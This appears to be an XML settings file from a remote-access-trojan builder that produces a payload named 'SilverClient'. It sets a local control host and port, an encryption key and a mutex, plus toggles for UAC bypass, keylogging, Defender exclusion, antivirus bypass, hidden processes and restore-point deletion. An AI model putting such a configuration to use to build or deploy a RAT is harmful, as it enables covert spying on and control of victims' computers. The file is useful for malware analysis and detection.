<settings>
  <Group>
  </Group>
  <DataEncryptionKey>oAFyVMpTLYYhTtzgEDINQvZYRlYmAD</DataEncryptionKey>
  <NormalDNS>True</NormalDNS>
  <Pastebin>False</Pastebin>
  <Host>127.0.0.1</Host>
  <Port>9999</Port>
  <ProcessMetux>lAxDBRhAFu</ProcessMetux>
  <Installation>False</Installation>
  <AutoStartup>False</AutoStartup>
  <Foldername>
  </Foldername>
  <ProgramData>True</ProgramData>
  <ProgramFiles>False</ProgramFiles>
  <AppData>False</AppData>
  <Processname>
  </Processname>
  <HiddenInstall>False</HiddenInstall>
  <BlockAccessPath>False</BlockAccessPath>
  <DeleteSystemRestorePoints>False</DeleteSystemRestorePoints>
  <BypassUAC>False</BypassUAC>
  <KeyloaggarOfflien>False</KeyloaggarOfflien>
  <DefeindrExclustion>False</DefeindrExclustion>
  <HiddenProcess>False</HiddenProcess>
  <BuilderCreateTask>False</BuilderCreateTask>
  <BuilderRunTask>1</BuilderRunTask>
  <Delay>False</Delay>
  <NumDelay>3</NumDelay>
  <ReconnectionDelay>False</ReconnectionDelay>
  <NUMReconnectionDelay>4</NUMReconnectionDelay>
  <SaveSettings>True</SaveSettings>
  <BypassAV>False</BypassAV>
  <PayloadName>SilverClient</PayloadName>
  <EnableDiscord>False</EnableDiscord>
  <URLDiscord>
  </URLDiscord>
  <exe>True</exe>
  <com>False</com>
  <cmd>False</cmd>
  <pif>False</pif>
  <scr>False</scr>
  <AssemblyInformation>False</AssemblyInformation>
  <Title>
  </Title>
  <Description>
  </Description>
  <Copyright>
  </Copyright>
  <Company>
  </Company>
  <Trademarks>
  </Trademarks>
  <Datemodified>False</Datemodified>
  <DatemodifiedValue>8/27/2022 8:14:00 PM</DatemodifiedValue>
  <VR1>0</VR1>
  <VR3>0</VR3>
  <VR4>0</VR4>
  <Icon>False</Icon>
  <IconPath>
  </IconPath>
</settings>